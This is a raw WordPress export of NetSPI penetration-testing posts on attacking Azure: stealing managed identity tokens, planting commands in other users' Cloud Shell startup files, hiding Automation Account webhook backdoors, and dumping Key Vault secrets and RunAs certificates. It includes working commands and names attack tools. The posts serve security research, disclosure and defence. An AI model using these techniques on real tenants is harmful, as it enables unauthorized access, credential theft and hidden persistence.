[post_title] => Adventures in Azure Privilege Escalation Webinar [post_excerpt] => During this webinar, NetSPI’s Karl Fosaaen will cover some of the common initial Azure access vectors, along with a handful of escalation paths for getting full control over an Azure tenant. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => adventures-in-azure-privilege-escalation-webinar [to_ping] => [pinged] => [post_modified] => 2021-06-02 08:57:56 [post_modified_gmt] => 2021-06-02 08:57:56 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19769 [menu_order] => 41 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 17411 [post_author] => 2 [post_date] => 2020-02-26 10:40:32 [post_date_gmt] => 2020-02-26 16:40:32 [post_content] => Nearly every organization is talking about moving to the Cloud, developing a strategy to move to the Cloud, moving to the Cloud, or already all in on the Cloud. Join two of NetSPI’s cloud security experts, Practice Director Karl Fosaaen and CISO/Managing Director Bill Carver to learn if your cloud assets are as protected as you think. [post_title] => Best Practices to Protect Your Organization's Cloud Assets [post_excerpt] => Nearly every organization is talking about moving to the Cloud, developing a strategy to move to the Cloud, moving to the Cloud, or already all in on the Cloud. Join two of NetSPI’s cloud security experts, Practice Director Karl Fosaaen and CISO/Managing Director Bill Carver to learn if your cloud assets are as protected as you think. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => best-practices-to-protect-your-organizations-cloud-assets [to_ping] => [pinged] => [post_modified] => 2021-06-02 08:58:17 [post_modified_gmt] => 2021-06-02 08:58:17 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17411 [menu_order] => 44 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 17432 [post_author] => 2 [post_date] => 2020-02-21 14:14:45 [post_date_gmt] => 2020-02-21 14:14:45 [post_content] =>

When a business migrates anything to a cloud infrastructure, there are a handful of common security gaps that we find as penetration testers. In this webinar, we'll share:

  • How data and access keys can be exposed
  • How user credentials can deliver privileges to more resources than intended
  • How access to a cloud account can provide an entry point to a corporate network via a VPN

We'll also share how to use cloud penetration testing as part of a cloud security testing program.

https://youtu.be/ffBcIkjumBc
[post_title] => Intro to Cloud Penetration Testing [post_excerpt] => Experts in pen testing cloud apps & infrastructure for vulnerabilities & misconfiguration. Learn about cloud pen testing and common cloud security gaps in this video now. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => intro-to-cloud-penetration-testing [to_ping] => [pinged] => [post_modified] => 2021-06-02 08:58:59 [post_modified_gmt] => 2021-06-02 08:58:59 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17432 [menu_order] => 49 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 11234 [post_author] => 10 [post_date] => 2020-02-20 07:00:37 [post_date_gmt] => 2020-02-20 07:00:37 [post_content] =>

Azure Managed Identities are Azure AD objects that allow Azure virtual machines to act as users in an Azure subscription. While this may sound like a bad idea, AWS utilizes IAM instance profiles for EC2 and Lambda execution roles to accomplish very similar results, so it's not an uncommon practice across cloud providers. In my experience, they are not as commonly used as AWS EC2 roles, but Azure Managed Identities may be a potential option for privilege escalation in an Azure subscription.

TL;DR - Managed Identities on Azure VMs can be given excessive Azure permissions. Access to these VMs could lead to privilege escalation.

Much like other Azure AD objects, these managed identities can be granted IAM permissions for specific resources in the subscription (storage accounts, databases, etc.) or they can be given subscription level permissions (Reader, Contributor, Owner). If the identity is given a role (Contributor, Owner, etc.) or privileges higher than those granted to the users with access to the VM, users should be able to escalate privileges from the virtual machine.

Vmtophat

Important note: Anyone with command execution rights on a Virtual Machine (VM), that has a Managed Identity, can execute commands as that managed identity from the VM.

Here are some potential scenarios that could result in command execution rights on an Azure VM:

Identifying Managed Identities

In the Azure portal, there are a couple of different places where you will be able to identify managed identities. The first option is the Virtual Machine section. Under each VM, there will be an "Identity" tab that will show the status of that VM's managed identity.

Id

Alternatively, you will be able to note managed identities in any Access Control (IAM) tabs where a managed identity has rights. In this example, the MGITest identity has Owner rights on the resource in question (a subscription).

Iam

From the AZ CLI - AzureAD User

To identify managed identities as an authenticated AzureAD user on the CLI, I normally get a list of the VMs (az vm list) and pipe that into the command to show identities.

Here's the full one-liner that I use (in an authenticated AZ CLI session) to identify managed identities in a subscription.

(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}

Since the principalId (a GUID) isn't the easiest thing to use to identify the specific managed identity, I print the VM name ($_.name) first to help figure out which VM (MGITest) owns the identity.

Mi List

From the AZ CLI - On the VM

Let's assume that you have a session (RDP, PS Remoting, etc.) on the Azure VM and you want to check if the VM has a managed identity. If the AZ CLI is installed, you can use the "az login --identity" command to authenticate as the VM to the CLI. If this is successful, you have confirmed that you have access to a Managed Identity.

From here, your best bet is to list out your permissions for the current subscription:

az role assignment list -–assignee ((az account list | ConvertFrom-Json).id)

Alternatively, you can enumerate through other resources in the subscription and check your rights on those IDs/Resource Groups/etc:

az resource list

az role assignment list --scope "/subscriptions/SUB_ID_GOES_HERE/PATH_TO_RESOURCE_GROUP/OR_RESOURCE_PATH"

From the Azure Metadata Service

If you don't have the AZ CLI on the VM that you have access to, you can still use PowerShell to make calls out to the Azure AD OAuth token service to get a token to use with the Azure REST APIs. While it's not as handy as the AZ CLI, it may be your only option.

To do this, invoke a web request to 169.254.169.254 for the oauth2 API with the following command:

Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing

If this returns an actual token, then you have a Managed Identity to work with. This token can then be used with the REST APIs to take actions in Azure. A simple proof of concept for this is included in the demo section below.

You can think of this method as similar to gathering AWS credentials from the metadata service from an EC2 host. Plenty has been written on that subject, but here's a good primer blog for further reading.

Limitations

Microsoft does limit the specific services that accept managed identities as authentication - Microsoft Documentation Page

Due to the current service limitations, the escalation options can be a bit limited, but you should have some options.

Privilege Escalation

Once we have access to a Managed Identity, and have confirmed the rights of that identity, then we can start escalating our privileges. Below are a few scenarios (descending by level of permissions) that you may find yourself in with a Managed Identity.

  • Identity is a Subscription Owner
    • Add a guest account to the subscription
      • Add that guest as an Owner
    • Add an existing domain user to the subscription as an Owner
      • See the demo below
  • Identity is a Subscription Contributor
    • Virtual Machine Lateral Movement
      • Managed Identity can execute commands on another VMs via Azure CLI or APIs
    • Storage Account Access
    • Configuration Access
  • Identity has rights to other subscriptions
    • Pivot to other subscription, evaluate permissions
  • Identity has access to Key Vaults
  • Identity is a Subscription Reader
    • Subscription Information Enumeration
      • List out available resources, users, etc for further use in privilege escalation

For more information on Azure privilege escalation techniques, check out my DerbyCon 9 talk:

Secondary Access Scenarios

You may not always have direct command execution on a virtual machine, but you may be able to indirectly run commands via Automation Account Runbooks.

I have seen subscriptions where a user does not have contributor (or command execution) rights on a VM, but they have Runbook creation and run rights on an Automation account. This automation account has subscription contributor rights, which allows the lesser privileged user to run commands on the VM through the Runbook. While this in itself is a privilege inheritance issue (See previous Key Vault blog), it can be abused by the previously outlined process to escalate privileges on the subscription.

Proof of Concept Code

Below is a basic PowerShell proof of concept that uses the Azure REST APIs to add a specific user to the subscription Owners group using a Managed Identity.

Proof of Concept Code Sample

All the code is commented, but the overall script process is as follows:

  1. Query the metadata service for the subscription ID
  2. Request an OAuth token from the metadata service
  3. Query the REST APIs for a list of roles, and find the subscription "Owner" GUID
  4. Add a specific user (see below) to the subscription "Owners" IAM role

The provided code sample can be modified (See: "CHANGE-ME-TO-AN-ID") to add a specific ID to the subscription Owners group.

While this is a little difficult to demo, we can see in the screen shot below that a new principal ID (starting with 64) was added to the owners group as part of the script execution.

Poc

2/25/20 - Update:

I created a secondary PoC function that will probably be more practical for everyday use. The function uses the same methods to get a token, but it uses the REST APIs to list out all of the available storage account keys. So if you have access to an Azure VM that is configured with Contributor or Storage Account Contributor, you should be able to list out all of the keys. These keys can then be used (See Azure Storage Explorer) to remotely access the storage accounts and give you further access to the subscription.

You can find the sample code here - get-MIStorageKeys.ps1

Conclusion

I have been in a fair number of Azure environments and can say that managed identities are not heavily used. But if a VM is configured with an overly permissive Managed Identity, this might be a handy way to escalate. I have actually seen this exact scenario (Managed Identity as an Owner) in a client environment, so it does happen.

From a permissions management perspective, you may have a valid reason for using managed identities, but double check how this identity might be misused by anyone with access (intentional or not) to the system.

[post_title] => Azure Privilege Escalation Using Managed Identities [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-privilege-escalation-using-managed-identities [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:58:33 [post_modified_gmt] => 2021-06-08 21:58:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11234 [menu_order] => 172 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 11179 [post_author] => 10 [post_date] => 2019-12-10 07:00:04 [post_date_gmt] => 2019-12-10 07:00:04 [post_content] => TLDR; By default, Azure Subscription Contributors have access to all storage accounts in a subscription. These storage accounts can contain Azure Cloud Shell storage files (Linux home directories) that can contain sensitive information. By modifying these Cloud Shell files, an attacker can execute commands in the Cloud Shell sessions of other users. This can lead to cross-account command execution and privilege escalation.

Intro

The Azure Cloud Shell (Bash or PowerShell) can be a handy way to manage Azure resources, but it can also be a potential source of sensitive data and privilege escalation during a penetration test. Azure Cloud Shell allows users to manage resources in Azure from “anywhere”. This includes shell.azure.com, the Azure mobile app , and the (new-ish and pretty fantastic) Microsoft Terminal application . I haven’t really found a practical way to use the Cloud Shell from the mobile app yet, but it’s an option. Cs Phone E In order to maintain a consistent experience from wherever/whenever you login, the Cloud Shell service keeps files in an Azure Storage account in your subscription. The Cloud Shell will be configured with a storage account of your choosing, and the actual files will be under the File Share Service for that storage account. If you’re using a storage account that was automatically generated from the cloud shell defaults, it will most likely be prefaced with “cs”. Portal For more info on how Azure Cloud Shell persists files, check out this Microsoft documentation - https://docs.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage

What Can We Do With Cloud Shell Files?

Let’s say that we’ve compromised an AzureAD account that has rights to read/write cloud shell File Shares. Usually this will be a contributor account on the subscription, but you may run into a user that has specific contributor rights to Storage Accounts. Important Note: By default, all subscription Contributor accounts will have read/write access to all subscription Storage Accounts, unless otherwise restricted. With this access, you should be able to download any available files in the Cloud Shell directory, including the acc_ACCT.img file (where ACCT is a name – See Above: acc_john.img). If there are multiple users with Cloud Shell instances in the same Storage Account, there will be multiple folders in the Storage Account. As an attacker, choose the account that you would like to attack (john) and download the IMG file for that account. This file is usually 5 GB, so it may take a minute to download. Download The IMG file is an EXT2 file system, so you can easily mount the file system on a Linux machine. Once mounted on your Linux machine, there are two paths that we can focus on.

Information Disclosure

If the Cloud Shell was used for any real work (Not just accidentally opened once…), there is a chance that the user operating the shell made some mistakes in their commands. If these mistakes were made with any of the Azure PowerShell cmdlets, the resulting error logs would end up in the .Azure (note the capital A) folder in the IMG file system. The NewAzVM cmdlet is particularly vulnerable here, as it can end up logging credentials for local administrator accounts for new virtual machines. In this case, we tried to create a VM with a non-compliant name. This caused an error which resulted in the "Cleartext?" password being logged.
PS Azure:> grep -b5 -a5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log
103341-      }
103349-    },
103356-    "osProfile": {
103375-      "computerName": "asdfghjkllkjhgfdasqweryuioasdgkjalsdfjksasdf",
103445-      "adminUsername": "netspi",
103478:      "adminPassword": "Cleartext?",
103515-      "windowsConfiguration": {}
103548-    },
103555-    "networkProfile": {
103579-      "networkInterfaces": [
103608-        {
If you’re parsing Cloud Shell IMG files, make sure that you look at the .Azure/ErrorRecords files for any sensitive information, as you might find something useful. Additionally, any of the command history files may have some interesting information:
  • .bash_history
  • .local/share/powershell/PSReadLine/ConsoleHost_history.txt

Cross-Account Command Execution

Let’s assume that you’ve compromised the “Bob” account in an Azure subscription. Bob is a Contributor on the subscription and shares the subscription with the “Alice” account. Alice is the owner of the subscription, and a Global Administrator for the Azure tenant. Alice is a Cloud Shell power user and has an instance on the subscription that Bob works on. Csdiagram Since Bob is a Contributor in the subscription, he has the rights (by default) to download any cloud shell .IMG file, including Alice's acc_alice.img. Once downloaded, Bob mounts the IMG file in a Linux system (mount acc_alice.img /mnt/) and appends any commands that he would like to run to the following two files:
  • .bashrc
  • /home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1
We'll download MicroBurst to the Cloud Shell as a proof of concept:
$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> .bashrc
$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> /home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1
Once Bob has added his attacking commands (see suggested commands below), he unmounts the IMG file, and uploads it back to the Azure Storage Account. When you go to upload the file, make sure that you select the “Overwrite if files already exist” box. When the upload has completed, the Cloud Shell environment is ready for the attack. The next Cloud Shell instance launched by the Alice account (from that subscription), will run the appended commands under the context of the Alice account. Note that this same attack could potentially be accomplished by mounting the file share in an Azure Linux VM instead of downloading, modifying, and uploading the file.

Example:

In this example, we've just modified both files to echo "Hello World" as a proof of concept. By modifying both the .bashrc and PowerShell Profile files, we have also ensured that our commands will run regardless of the type of Cloud Shell that is selected. Cloudshell At this point, your options for command execution are endless, but I'd suggest using this to add your current user as a more privileged user (Owner) on the current subscriptions or other subscriptions in the tenant that your victim user has access to. If you're unsure of what subscriptions your victim user has access to, take a look at the .azure/azureProfile.json file in their Cloud Shell directory. Finally, if your target user isn't making use of a Cloud Shell during your engagement, a well placed phishing email with a link to https://shell.azure.com/ could be used to get a user to initiate a Cloud Shell session. Cloudshellphish  

MSRC Disclosure Timeline

Both of these issues (Info Disclosure and Privilege Escalation) were submitted to MSRC:
  • 10/21/19 – VULN-011207 and VULN-011212 created and assigned case numbers
  • 10/25/19 - Privilege Elevation issue (VULN-011212) status changed to "Complete"
    • MSRC Response: "Based on our understanding of your report, this is expected behavior. Allowing a user access to storage is the equivalent of allowing access to a home directory. In this case, we are giving end users the ability to control access to storage accounts and file shares. End users should only grant access to trusted users."
  • 10/28/19 - Additional Context sent to MSRC to clarify the standard Storage Account permissions
  • 11/1/19 - Information Disclosure issue (VULN-011207) status changed to "Complete"
    • Truncated MSRC Response: "The engineering team has reviewed your findings, and we have determined that this is the current designed behavior for logging. While this specific logging ability is not described well in our documentation, there is some guidance around storage account creation to limit who has access to the log files - https://docs.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#create-new-storage.
      In the future, the team is considering the option of adding more detail into the documentation to describe the scenario you reported along with guidance on protecting access to log files. They are also looking into additional protections that can be added into Cloud Shell as new features to better restrict access or obfuscate entries that may contain secrets."
  • 12/4/19 - Cloud Shell privilege escalation issue (VULN-011212) status changed to "Complete"
Special thanks go out to one of our NetSPI security consultants, Jake Karnes, who was really helpful in testing out the Storage account contributor rights and patiently waited for the upload/download of the 5 GB IMG test files. [post_title] => Azure Privilege Escalation via Cloud Shell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-azure-cloud-shell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:57:55 [post_modified_gmt] => 2021-06-08 21:57:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11179 [menu_order] => 184 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [15] => WP_Post Object ( [ID] => 10747 [post_author] => 10 [post_date] => 2019-09-12 07:00:30 [post_date_gmt] => 2019-09-12 07:00:30 [post_content] => In every penetration test that involves Azure, we want to escalate our privileges up to a global administrator of the tenant. Once we've escalated our privileges in an Azure tenant, we want to have the ability to maintain our access to each subscription and the tenant as a whole. Aside from the benefits of controlling the Azure tenant, it can be really handy to have an Azure backdoor that could (potentially) be used to pivot back into the main AD environment. After escalating privileges in the Azure Tenant, we can make use of Automation Runbooks to persist in the Azure environment. There are multiple ways to persist in Azure, but for this post, we will focus on using Automation Accounts that are configured with excessive privileges, automation runbooks, and webhook triggers that will allow us to regain access to an Azure environment, with a single POST request.

TLDR

Want to maintain privileges in Azure? Add an Automation Account with excessive privileges that can be used to add new accounts (with Subscription Owner permissions) to AzureAD via a single POST request.

Potential Persistence Scenario

For the purposes of this blog, imagine this fairly standard Azure attack life cycle:
  1. Attacker compromises an Azure account/system
  2. Attacker escalates Azure privileges up to Global Administrator
  3. Blue team revokes initial access and/or Global Administrator access
In this type of scenario, we will want to have some type of persistence option available to re-enable our access into a tenant. Based off of my experience, Automation accounts typically fly under the radar. If they are set up properly, they can be use to regain Owner (or higher*) permissions to subscriptions in the Azure tenant with a new AzureAD account. Since newly created Azure accounts are more likely to get noticed, they should be used for short term access. While the Automation Accounts will act as the long haul persistence account. The Automation Accounts can also be configured for password access, or cert-based authentication, so those can also be an option for getting back into the subscription.

General Process:

  1. Create a new Automation Account
  2. Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
    1. Sample runbook for this Blog located here - https://github.com/NetSPI/MicroBurst
  3. Add the AzureAD module to the Automation account
    1. Update the Azure Automation Modules
  4. Assign "User Administrator" and "Subscription Owner" rights to the automation account
  5. Add a webhook to the runbook
  6. Eventually lose your access...
  7. Trigger the webhook with a post request to create the new user
*This runbook could be modified to be run as a global admin that creates a new global admin, but that's really noisy. Let me know if you do this. I'd be interested to see how well it works. I realize this is a bit of a legwork just to maintain persistence. The eventual goal is to automate this process with some PowerShell and integrate it with the existing MicroBurst tools.

Creating the Automation Account

Navigate to the "Automation Accounts" section of the Azure portal and create a new automation account. Naming it something basic, like BackupAutomationProcess, should avoid raising too many suspicions. Make sure that you set the "Create Azure Run As account" to yes, as this will be needed to run the backdoor runbook code. Autoaccount Add If you want to blend in with the default runbooks, the imported runbook name should follow the same naming strategy as the tutorials (AzureAutomationTutorial*). If you follow this naming convention, you will want to import and publish your malicious runbook into the account as soon as possible. The closer the timestamp is to your other tutorial runbooks, the less suspicious it will be. Can you tell which of these runbooks is the malicious one? Runbooks Once imported, you will also need to publish the runbook. This will then allow you to set a webhook for remote triggering of the runbook. To set the webhook, go to the Webhooks tab under the runbook. Webhook Depending on how long your operation is running, you may want to set your expiration date way off in the future to protect your ability to trigger the webhook. Important Step - Copy the webhook URL and keep it for when you need to trigger your backdoor.

Module Maintenance

Since the AzureAD module is not standard for Automation Accounts, you will need to import it into your account. Go to the Modules tab for the Automation account and use the "Browse Gallery" feature to find the "AzureAD" module.  Import it into your account, wait a few (5-10) minutes for it to deploy. The modules can sometimes take a while to populate to the Automation Accounts, so be patient. Azuread Additionally, your Automation Account may not play nicely with the current/old version of the AzureRM modules. I don't really know why this is still an issue for Azure, but you may need to update your Azure Automation Modules. This can be done with this runbook - https://aka.ms/UpdateModulesRunbookGitHub Since we're using a new Automation Account, the updates shouldn't cause any issues with existing runbooks. Alternatively, if you're using an existing Automation account for all of this, updating the modules could cause compatibility issues with existing runbooks. You would also need to assign the additional rights to the existing automation account, which is what we will cover next.

Setting Automation Account Rights

Once the automation account is configured and the webhook is set, the automation account will need the proper rights to add a new user, and give it owner rights on the subscription. To add these rights, navigate to the Azure Active Directory tab with a tenant admin account, and open the "Roles and Administrators" section. Within that section open the "User Administrator" role and add the automation account to the group. The Automation Account will be labeled with the name of the account, and a base64 string appended at the end. Autoaccount Given the fact that this username may stick out against the other users in the group, you may want to rename the Automation Account. This can be done in the AzureAD->App Registrations section, under "Branding". Renamed After adding user administrator rights, the automation account user will needed to be added as an owner on the subscription. This can be done through the subscriptions tab. Select the subscription that you want to persist in, and go to the Access Control (IAM) tab. Add the Owner role assignment to your Automation account, and you should be all set. This will also take a few minutes to populate, so give it a little while before you actually try to trigger the webhook.

Triggering the Webhook

Let's say that after escalating privileges and setting a persistence backdoor, the compromised tenant admin account gets flagged, and now you're locked out. Using the webhook URL from the earlier steps, and the example caller function below, you can now create a new subscription owner account (BlogDemoUser- Password123) for yourself in Azure.
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" $AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}}) $body = ConvertTo-Json -InputObject $AccountInfo $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
This process may take a minute, as the runbook job will need to spool up, but after it has completed, you should have a newly minted subscription Owner account. Persist

Potential Concerns and Detection Techniques

While this process can be somewhat quiet in the right environment, it may be fairly obvious in the wrong one. A couple of things to keep in mind:
  • Creating a new AzureAD user could/should trigger an alert
  • Creating a new Automation Account could/should trigger an alert
  • Adding a user to the User Administrators and Owners groups could/should trigger an alert
Since the Automation Accounts section are not typically in an Azure user's portal dashboard, an attacker may be able to hide out for a while in the automation account. [post_title] => Maintaining Azure Persistence via Automation Accounts [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => maintaining-azure-persistence-via-automation-accounts [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:57:47 [post_modified_gmt] => 2021-06-08 21:57:47 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=10747 [menu_order] => 191 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 10304 [post_author] => 10 [post_date] => 2019-03-20 07:00:23 [post_date_gmt] => 2019-03-20 07:00:23 [post_content] => This is the second post in a series of blogs that focuses around Azure Automation. Check out "Exporting Azure RunAs Certificates for Persistence" for more info on how authentication works for Automation Accounts. In this installment, we're going to focus on making use of Automation Accounts to gain access to sensitive data stored in Key Vaults. High Level TLDR:
  1. Gain access to an AzureAD account that has rights to create/modify/run automation runbooks in existing Automation Accounts
    1. This AzureAD account doesn't have access to any Key Vaults, but you want to read the vaults
  2. Access an Automation Account configured with rights to read keys from a Key Vault
  3. Add (or modify) a runbook for the Automation Account to access the Key Vault and dump the secrets
  4. Use your newfound secrets for further pivoting in the environment
I have been frequently running into situations where I have contributor access to a subscription, but I'm unable to access the data in the Azure Key Vaults. Since I can't grant myself access to the vaults (requires Owner rights), I've had to come up with some creative ways for accessing the Key Vaults with Contributor accounts.

Initial Access

Most of the time that we have access to a Contributor account in Azure, the account does not have access to any of the Key Vaults in the subscription. Security conscious developers/engineers will limit the rights for normal users and assign application specific accounts to handle accessing Key Vaults. This limits the liability put on user accounts, and keeps the secrets with the application service accounts. While we may not have access to the Key Vaults, we do have contributor rights on the Automation Account runbooks. This grants us the rights to create/modify/run automation runbooks for the existing Automation Accounts, which allows us to run code as automation users, that may have rights to access Key Vaults. Keyreaderoverlap So why does this happen? As a best practice for automating specific tasks within Azure, engineers may vault keys/credentials that are used by automation runbooks. The Automation Accounts are then granted access to the Key Vaults to make use of the keys/credentials as part of the automation process to help abstract the credentials away from the runbook code and the users. Common Automation Key Vault Applications:
  • Keys for encrypting data in an application
  • Local administrator passwords for VMs
  • SQL database credentials for accessing AzureSQL databases
  • Access key storage for other Azure services
As a side note: Azure developers/engineers are getting better at making use of Key Vaults for automation credentials, but we still occasionally see credentials that are hard-coded in runbooks. If you have read access on runbooks, keep an eye out for hard-coded credentials. Passwordinsource

Creating a New Runbook

In order to access the key vaults from the Automation Accounts, we will need to create a new runbook that will list out each of the vaults, and all of the keys for each vault. We will then run this runbook with the RunAs account, along with any credentials configured for the account. So far, this shotgun approach has been the easiest way to enumerate key values in a vault, but it's not the most opsec friendly method. In many of the environments that I've seen, there are specific alerting rules already set up for unauthorized access attempts to key vaults. So be careful when you're doing this. Newrunbook It has been a little difficult trying to come up with a method for determining Automation user access before running a runbook in the Automation Account. There's no way to grab cleartext automation credentials from an Automation Account without running a runbook, and it's a little tricky (but possible) to get the Key Vault rights for RunAs accounts before running a runbook. Grand scheme of things... you will need to run a runbook to pull the keys, so you might as well go for all the keys at once. If you want to be more careful with the Automation Accounts that you use for this attack, keep an eye out for runbooks that have code to specifically read from Key Vaults. Chances are good that the account has access to one or more vaults. You can also choose the specific automation accounts that you want to use in the following script.

Automating the Process

At a high level, here's what we will accomplish with the "Get-AzureKeyVaults-Automation" PowerShell function":
  1. List the Automation Accounts
    1. Select the Automation Accounts that you want to use
  2. Iterate through the list and run a standardized runbook in each selected account (with a randomized job name)
    1. List all of the Key Vaults
    2. Attempt to read every key with the current account
    3. Complete these actions with both the RunAs and Stored Credential accounts
  3. Output all of the keys that you can access
    1. There may be duplicate results at the end due to key access overlap
This PowerShell function is available under the MicroBurst repository. You can find MicroBurst here - https://github.com/NetSPI/MicroBurst

Example

Here's a sample run of the function in my test domain:
Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSize
Keyvaultdump Example Output: Keyvaultpasswords

Conclusions

For the Attackers - You may have a situation where you need to access Key Vaults with a lesser privileged user. Hopefully the code/function presented in this blog allows you to move laterally to read the secrets in the vault. For the Defenders - If you're using Automation Accounts in your subscription, there's a good chance that you will need to configure an Automation Account with Key Vault reader rights. When doing this, make sure that you're limiting the Key Vaults that the account has access to. Additionally, be careful with who you give subscription contributor access to. If a contributor is compromised, your Automation Accounts may just give up your secrets.

Update - 12/30/2019

This issue was not initially reported to MSRC, due to the fact that it's a user misconfiguration issue and not eligible for reporting per the MSRC guidelines ("Security misconfiguration of a service by a user"). However, they became aware of the blog and ended up issuing a CVE for it - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0962 [post_title] => Using Azure Automation Accounts to Access Key Vaults [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-automation-accounts-key-stores [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:57:04 [post_modified_gmt] => 2021-06-08 21:57:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=10304 [menu_order] => 198 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 10168 [post_author] => 10 [post_date] => 2019-02-27 07:00:53 [post_date_gmt] => 2019-02-27 07:00:53 [post_content] =>

This post will be the first blog in a series that focuses around Azure Automation. I've recently run into a fair number of clients making use of Azure Automation Runbooks, and in many cases, the runbooks are being misconfigured. As attackers, these misconfigurations can provide us credentials, sensitive data, and some interesting points for escalation.

Here's the high level TLDR overview of a standard usage of the scenario outlined in this blog:

  1. Gain access to an Azure AD account that has been provided runbook/Automation account permissions
  2. Create and run a runbook that gathers available RunAs certificate files
  3. Use the certificate files to maintain privileged access to an Azure environment
  4. Automate the whole process to simplify persistence options

Intro to Automation Accounts

Automation accounts are Azure's way of handling subscription process automation. Most implementations that I have been exposed to are set up to generate reports, copy over logs, or generally manage Azure resources. In general, the runbooks that I have seen are fairly basic and act as scheduled jobs to handle basic tasks. That being said, Automation runbooks can handle many different modules to allow you to administer multiple aspects of an Azure subscription.

Before we get too far, there's a couple of base terms to cover:

  • Automation Account
    • This is how Azure defines the high level organization unit for runbooks
    • Automation accounts are the container for runbooks
    • Subscription inherited (Owner/Contributor/Reader) IAM/Access control roles are applied at this level
  • Runbook
    • This is the specific code/script/workflow that you would run under an automation account
    • Typically PowerShell, Python, or a Workflow
    • These can also contain sensitive data, so looking over the code can be useful
  • Automation credential
    • These are the credentials used by the Runbook to accomplish tasks
    • Frequently set up as a privileged (contributor) account
    • There are two types of credentials
      • Traditional username/password
      • RunAs certificates

Both types of credentials (Passwords/RunAs) can typically be used to get access to subscriptions via the Azure PowerShell cmdlets.

Passwords versus Certificates

Automation Credentials are a cleartext username and password that you can call within a runbook for authentication. So if you're able to create a runbook, you can export these from the Automation account. If these are domain credentials, you should be able to use them to authenticate to the subscription.  I already covered the cleartext automation credentials in a previous post, so feel free to read up more about those there.

Az Cred

Surprisingly, I have found several instances where the automation credential account is set up with Global Administrator permissions for the Azure tenant, and that can lead to some interesting escalation opportunities.

Autocerts

The primary (and more common) option for running Runbooks is with a RunAs certificate. When creating a RunAs certificate, a RunAs account is registered as a Service Principal in Azure AD for the certificate/account. This "App" account is then added to the Contributors group for the domain. While some Azure admins may lock down the permissions for the account, we typically see these accounts as an opportunity to escalate privileges in an Azure environment.

If a "regular", lesser privileged user, has rights to create/run/modify Runbooks, they inherently have Contributor level rights for the subscription. While this is less likely, there is a chance that a user may have been granted contributor rights on an automation account. Check out this post by Microsoft for a full rundown of Automation Account Role Based Access Controls. At a high level, the subscription Owner and Contributor roles will have full access to Automation accounts.

Regardless of the privilege escalation element, we may also want to maintain access to an Azure environment after our initial account access is removed. We can do that by exporting RunAs certificates from the Automation account. These certificates can be used later to regain access to the Azure subscription.

Exporting Certificates

You will need to start by grabbing a copy of MicroBurst from the NetSPI Github.

The script (Get-AzurePasswords) was previously released, and already had the ability to dump the cleartext passwords for Automation accounts. If that is not an option for an Automation account that you're attacking, you now have the functionality to export a PFX file for authentication.

The script will run an Automation Runbook on the subscription that exports the PFX file and writes it out to a local file.  Once that is complete, you should have a ps1 file that you can use to automate the login for that RunAs account. I initially had this script pivoting the PFX files out through a Storage Account container, but found an easier way to just cast the files as Base64, and export them through the job output.

Example Command: Get-AzurePasswords -Keys N -AppServices N -Verbose

Dumpcertsdemo

Using the Authentication

The initial need for collecting automation certificates came from a recent assessment where I was able to pull down cleartext credentials for an automation account, but multi-factor authentication got in the way of actually using the credentials. In order to maintain contributor level access on the subscription, I needed to gather Automation certificates. If the initial access account was burned, I would still have multiple contributor accounts that I could fall back on to maintain access to the Azure subscription.

It's important to make a note about permissions here. Contributor access on the subscription inherently gives you contributor rights on all of the virtual machines.

